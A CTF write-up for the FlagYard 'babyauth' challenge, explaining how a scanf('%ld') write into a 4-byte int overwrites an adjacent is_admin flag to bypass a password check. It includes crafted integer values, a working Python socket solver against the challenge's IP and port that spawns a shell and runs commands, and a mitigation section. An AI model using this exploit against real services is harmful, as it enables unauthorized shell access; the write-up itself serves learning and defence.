Writeup

FlagYard babyauth — Writeup

Mohammed-Amine Bouaafia

November 11, 2025

2 min read

pwn memory-corruption stack reverse-engineering

FlagYard babyauth — Writeup

Compact writeup for a beginner auth bypass via a type-size mismatch that corrupts a neighboring stack variable.

Summary

The binary asks for a numeric length, allocates a buffer, reads a password, and compares it to the environment variable SECRET. If it matches, it sets is_admin = 1 and spawns a shell. A bug in getval passes an int * to scanf("%ld") by casting: getval("length: ", (long*)&len); causing scanf to write 8 bytes (size of long on x86_64) into a 4‑byte slot. This overwrites the adjacent is_admin variable. We can force is_admin = 1 without knowing SECRET.

Vulnerability

Stack locals (typical layout):

1
int is_admin = 0;
2
int len;
3
getval("length: ", (long*)&len); // scanf("%ld") writes 8 bytes at &len

Memory write covers len (first 4 bytes) + is_admin (next or previous 4 depending on ordering). Supplying a crafted 64‑bit integer sets is_admin=1.

Primary pattern (if layout is [len][is_admin]):

1
value = (1 << 32) | desired_len
2
example desired_len = 32  -> 4294967328

Alternate pattern (if layout reversed):

1
value = (desired_len << 32) | 1
2
example desired_len = 32  -> 137438953473

Exploitation

Connect to service.
At length: prompt send crafted 64‑bit decimal.
At password: prompt send any string (check now bypassed).
Receive [+] Authenticated and interact with shell.

Socket Solver

1
#!/usr/bin/env python3
2
import socket, time
3

4
HOST = "34.252.33.37"
5
PORT = 31886
6

7
PRIMARY = (1 << 32) | 32        # 4294967328
8
ALT     = (32 << 32) | 1        # 137438953473
9

10
def attempt(val):
11
    print(f"[+] Trying {val}")
12
    s = socket.create_connection((HOST, PORT))
13
    s.recv(1024)                # "length: "
14
    s.sendall(str(val).encode() + b"\n")
15
    s.recv(1024)                # "password: "
16
    s.sendall(b"A\n")
17
    out = s.recv(1024)
18
    print(out.decode(errors="ignore").strip())
19
    if b"Authenticated" in out:
20
        s.sendall(b"id\n"); time.sleep(0.2)
21
        print(s.recv(4096).decode(errors="ignore"))
22
        # Example flag retrieval (adjust path as needed):
23
        # s.sendall(b"cat flag.txt\n"); time.sleep(0.2); print(s.recv(4096).decode(errors="ignore"))
24
        return True
25
    s.close()
26
    return False
27

28
if __name__ == "__main__":
29
    if not attempt(PRIMARY):
30
        attempt(ALT)

Result

After successful overwrite you get a shell; read the challenge flag from the expected location (e.g. cat flag.txt).

Mitigation

Match format specifiers to variable types: use scanf("%d", &len) or declare len as long.
Compile with warnings (-Wall -Wextra -Wformat).
Consider stack variable reordering or adding SSP/canaries (already present but not relevant here).

Takeaway

A single unsafe cast turns a straightforward auth check into a trivial privilege bypass. Always heed compiler warnings about format and type mismatches.